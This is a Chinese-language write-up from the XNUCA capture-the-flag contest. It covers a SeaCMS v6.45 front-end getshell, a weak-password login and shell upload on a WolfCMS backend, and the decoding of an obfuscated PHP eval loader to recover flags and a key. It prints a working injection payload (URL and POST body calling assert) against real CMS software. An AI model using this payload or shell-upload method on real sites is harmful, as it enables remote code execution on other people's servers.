XNUCA-Writeup

#No.8 看视频真嗨皮(读:50分,写:100分)

1
2
3
4
提交
关键字词:一档靶标题
===============================================================
周末看个电影放松一下吧!

海洋cms v6.45前台getshell漏洞

payload:

1
2
url:http://6f781364dedf5dc1eb877079f415877b.xnuca.cn/search.php?searchtype=5&tid=0&year=23334444);assert($_POST[1]);//
post:searchword=d&order=}{end if}{if:1)print_r($_POST[func]($_POST[cmd]));//}{end if}&func=assert&cmd=phpinfo();

phpinfo()正常执行。

通过system函数执行命令。
1
找flag位置
2
查询flag
3
创建文件
4

#No.23 找入口(读:100分,写:200分)

1
2
3
4
提交
关键字词:二档靶标题
===============================================================
本站的基本职能是什么

找到网站后台,发现后台是弱口令username=admin&password=admin

wolfcms 任意文件上传

后台直接上传shell,根据前台的logo找到对应的路径。

按照上一题的套路查看flag,写文件。
5
6

第三轮

0x00信息收集

####操作内容
根据提示,访问main.js,找到作者信息

1
2
3
4
5
6
7
/*
* main.js v1.0
*
* 2017/5/20
* author l1Kai@youngin.uu.me
*
*/

github找到作者https://github.com/l1Kai/user

获得config.php和flag

1
2
3
<?php $payload="fVJNc9sgEP1BuUhOPC2HHmxsbJBCDAgkc5NRJCtCHx3HVsivL5aTaZtDDgwDu++93be7Yj2FHbEmU4NpZZ+FYC0UKTP30MUzHR5aGuQpOMfdsjfQDE9jEK3Y0OhUDwefjxsOxRokCuITflk76h7G+GVxfhR4ytUb1ebp3EawWDOrEq5wF0PTRcmJwpZb3dqzFlXH14QxRRPixo645se/GiTgMGkQ5cKciDNfeUUSAMkRIcS9lVnAibSgjGt8ieuHC67/58K2QMwCKRR/5AKfyF1eHe/auoVfeQmTDShFoDSuxzqq+9+e7+x5hyf384K3Ra8zYvHGvmO0FEkIYq6aaucWFFZBlKf7KoKo0xkvDynq8pSW3uNLsVHv2awY964aIhZEz14Tw0XleVoMq6NOw7HYNj1BYMsVm3Km+Nb7Vfsb3s5HvMKroNqnvDGzt6OZHa0Jge9VjRHkJQ+UnHyecEuwYv2E/ajNHrJl8CyqJguXOxl+q8WSkMrvtOS0A1evbxolu+5J/4lf+RnFQsrrG+ANavSWnvYZ9R7S0ntuDfR1BHSXBK+Ei788Hiu4Qoorr/8dNiRIKoWufVzneNMfnM5QmPs5RYjskpCvZdOciQMX05qLmYVH0/F5HNLXfUa8F/OXwwa9Gzcf8+3itqMdteaeDofZvDT33Oezfvr3M9bZcShWp19/AA==";
preg_replace('/.*/e',"\x65\x76\x61\x6c\x28\x62\x61\x73\x65\x36\x34\x5f\x64\x65\x63\x6f\x64\x65\x28\x67\x7a\x69\x6e\x66\x6c\x61\x74\x65\x28\x62\x61\x73\x65\x36\x34\x5f\x64\x65\x63\x6f\x64\x65\x28\x24\x70\x61\x79\x6c\x6f\x61\x64\x29\x2c\x30\x29\x29\x29",'.'); ?>
flag{e76cd8c1-d747-4259-aaac-bc36efe62462}

FLAG值

flag{e76cd8c1-d747-4259-aaac-bc36efe62462}

0x01信息分析

操作内容

用python输出\x部分。

eval(base64_decode(gzinflate(base64_decode($payload),0)))

php解密

1
2
3
4
<?php
$payload="fVJNc9sgEP1BuUhOPC2HHmxsbJBCDAgkc5NRJCtCHx3HVsivL5aTaZtDDgwDu++93be7Yj2FHbEmU4NpZZ+FYC0UKTP30MUzHR5aGuQpOMfdsjfQDE9jEK3Y0OhUDwefjxsOxRokCuITflk76h7G+GVxfhR4ytUb1ebp3EawWDOrEq5wF0PTRcmJwpZb3dqzFlXH14QxRRPixo645se/GiTgMGkQ5cKciDNfeUUSAMkRIcS9lVnAibSgjGt8ieuHC67/58K2QMwCKRR/5AKfyF1eHe/auoVfeQmTDShFoDSuxzqq+9+e7+x5hyf384K3Ra8zYvHGvmO0FEkIYq6aaucWFFZBlKf7KoKo0xkvDynq8pSW3uNLsVHv2awY964aIhZEz14Tw0XleVoMq6NOw7HYNj1BYMsVm3Km+Nb7Vfsb3s5HvMKroNqnvDGzt6OZHa0Jge9VjRHkJQ+UnHyecEuwYv2E/ajNHrJl8CyqJguXOxl+q8WSkMrvtOS0A1evbxolu+5J/4lf+RnFQsrrG+ANavSWnvYZ9R7S0ntuDfR1BHSXBK+Ei788Hiu4Qoorr/8dNiRIKoWufVzneNMfnM5QmPs5RYjskpCvZdOciQMX05qLmYVH0/F5HNLXfUa8F/OXwwa9Gzcf8+3itqMdteaeDofZvDT33Oezfvr3M9bZcShWp19/AA==";
echo (base64_decode(gzinflate(base64_decode($payload),0)));
?>

得到config.php

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30

require(__DIR__.'/function.php');

define("DBHOST","127.0.0.1");
define('DBUSER','');
define('DBPASS','');
define('DBNAME','');
define('ROOTDRI',__DIR__."/../");
define("WEB_TITLE",'标题');
define("PRO_KEY","***....");// where is PRO_KEY ?

if (!get_magic_quotes_gpc())
{
if (!empty($_GET))
{
$_GET = addslashes_deep($_GET);
}
if (!empty($_POST))
{
$_POST = addslashes_deep($_POST);
}

$_COOKIE = addslashes_deep($_COOKIE);
$_REQUEST = addslashes_deep($_REQUEST);
}

require(ROOTDRI.'/org/smarty/Smarty.class.php');
session_start();

exit;

查看之前的历史提交,找到最初的config.php,修改php输出执行的内容。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
<?php
function _rZBFc5($_AXxuMn)
{
$keyStr = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=";
$chr1 = $chr2 = $chr3 = "";
$enc1 = $enc2 = $enc3 = $enc4 = "";
$i = 0;
$output = "";
$_AXxuMn = preg_replace("[^A-Za-z0-9\\+\\/\\=]", "", $_AXxuMn);
do {
$enc1 = strpos($keyStr, substr($_AXxuMn, $i++, 1));
$enc2 = strpos($keyStr, substr($_AXxuMn, $i++, 1));
$enc3 = strpos($keyStr, substr($_AXxuMn, $i++, 1));
$enc4 = strpos($keyStr, substr($_AXxuMn, $i++, 1));
$chr1 = $enc1 << 2 | $enc2 >> 4;
$chr2 = ($enc2 & 15) << 4 | $enc3 >> 2;
$chr3 = ($enc3 & 3) << 6 | $enc4;
$output = $output . chr((int) $chr1);
if ($enc3 != 64) {
$output = $output . chr((int) $chr2);
}
if ($enc4 != 64) {
$output = $output . chr((int) $chr3);
}
$chr1 = $chr2 = $chr3 = "";
$enc1 = $enc2 = $enc3 = $enc4 = "";
} while ($i < strlen($_AXxuMn));
return $output;
}
function _g1S4Ve($_XJwGpK)
{
return _rZBFc5($_XJwGpK);
}
function _Xvtafz($_4LYEpc)
{
return gzinflate($_4LYEpc, 0);
}
function _ehljDM($_j045Zz)
{
return eval($_j045Zz);
}
$_Za0oXi = "fVNNk6IwEP1BcwHU2uWwBw2gCZidhBAgN4zDhwkfVY4y+Os34kzt7hw8pFKp7vde9+uOR/pr2Gzawzbo3m7KwaeNym9kjNh6wjf4jj3aCmDXe4/YERMat/koTmopWlzvd1YVNj8x6JCWGR9km/SZ7foxR2U2LbvIEfahxVaRupeo2/QSyOH3aIUeGZRIxXAw+VBREPsu4wCe4cmf8LQco9P6so/hnCu2vC3SlQ7B0SeaM8phFwHZheyMQUu1aPVFxFVHfUQIxwxNY4cm9eNfDWRRwFSAaSzPaJLfeWNmuQkNEELTR5lZFCXaLaMGXqNmeYXN/1xQHwOi3STmdE9jeEYvRVW/tE0LvvMikii3jC0uYDM2e7Ze7NN8iR3e5E4+iRaujI+OOPkLvOWnnAVaMKSElzdzb5UVFmlehSDoREbLQxp0RYpL4/P1uOW3zDmO+VQNIbHCN6MLwbqCW91CUNUitcfjTvUocHeUkzlnju8Mb2Nu8Dif8Qp6VpWnVEnno5ZOraXtmn75GAJaUosncz0zbuN6pJ+xn7XpQ7ax3uJKZfbmNbGfahFm4+SZVjLvwd3vh0ZJ7rvSf+E9M6coTpL724XbQIkdPucZ7kWGS+O7lsDUYeFXZr0jGv/lMdiY8oBTbvSfYW0UJJwH9z7us3zoD5PIArvIkA4D9Mps6idKXdDkXmUrr9Kxa9nRVWTj9zxDxovVyfylm5xWY7FbP/a0w1ou8HBwVqVcUJNP+q8Zi6wejt751x8=";
echo _g1S4Ve(_Xvtafz(_g1S4Ve($_Za0oXi),0))

?>

得到flag

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31

/* flag{9660dc40-0272-44fd-a045-6e6f0f98fca0} */
require(__DIR__.'/function.php');

define("DBHOST","127.0.0.1");
define('DBUSER','');
define('DBPASS','');
define('DBNAME','');
define('ROOTDRI',__DIR__."/../");
define("WEB_TITLE",'标题');
define("PRO_KEY","1071f87ebcf2fb9f96f174eca1ee2dd6");

if (!get_magic_quotes_gpc())
{
if (!empty($_GET))
{
$_GET = addslashes_deep($_GET);
}
if (!empty($_POST))
{
$_POST = addslashes_deep($_POST);
}

$_COOKIE = addslashes_deep($_COOKIE);
$_REQUEST = addslashes_deep($_REQUEST);
}

require(ROOTDRI.'/org/smarty/Smarty.class.php');
session_start();

exit;

FLAG值

flag{9660dc40-0272-44fd-a045-6e6f0f98fca0}

0x02开始渗透

操作内容

github上的项目名为user,访问user目录,提示登陆。

根据登陆页面,用户名是邮箱,根据给出提示猜测密码。

邮箱为github邮箱,密码为likai,得到flag。

FLAG值

flag{cc498da1-3918-48be-b9e2-c64c69a5349e}